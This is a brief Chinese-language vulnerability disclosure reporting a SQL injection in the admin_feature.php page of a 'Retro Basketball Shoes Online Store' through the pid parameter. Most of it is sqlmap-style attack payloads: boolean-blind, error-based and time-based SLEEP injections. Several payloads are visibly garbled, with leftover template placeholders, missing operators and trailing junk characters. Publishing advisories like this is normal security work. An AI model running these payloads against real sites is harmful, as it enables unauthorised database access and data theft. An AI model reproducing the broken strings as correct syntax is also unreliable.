关键漏洞信息 受影响产品 Retro Basketball Shoes Online Store 漏洞文件 /admin/admin_feature.php 影响版本 V1.0 漏洞类型 SQL Injection 根因 存在SQL注入漏洞,原因是在SQL查询中没有正确地转义参数。 示例Payloads Boolean-based blind - Title: MySQL BLIND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (AND) - Payload: pid=68129' AND [SUCCE$(CASE WHEN (ASCII(SUBSTR((SELECT CONCAT(0x74657374),[INFERENCE] FROM [TABLE])),[OFFSET],1))>[CHAR]) THEN RAND()>1 ELSE 01 END)]-- Error-based - Title: MySQL >= 5.0.12 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) - Payload: pid=68129' AND (SELECT 1234 FROM(SELECT COUNT(),CONCAT(0x74657374,(SELECT (ELT(68129=68129))),0x74657374,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Time-based blind** - Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) - Payload: pid=68129' AND (SELECT 3839 FROM (SELECT(SLEEP(5)))V())#-- +kKlSome+where=l1154&tracks= ``` 这些信息表明该在线商店项目存在SQL注入漏洞,攻击者可以通过特定的payload利用此漏洞进行数据泄露或其他恶意操作。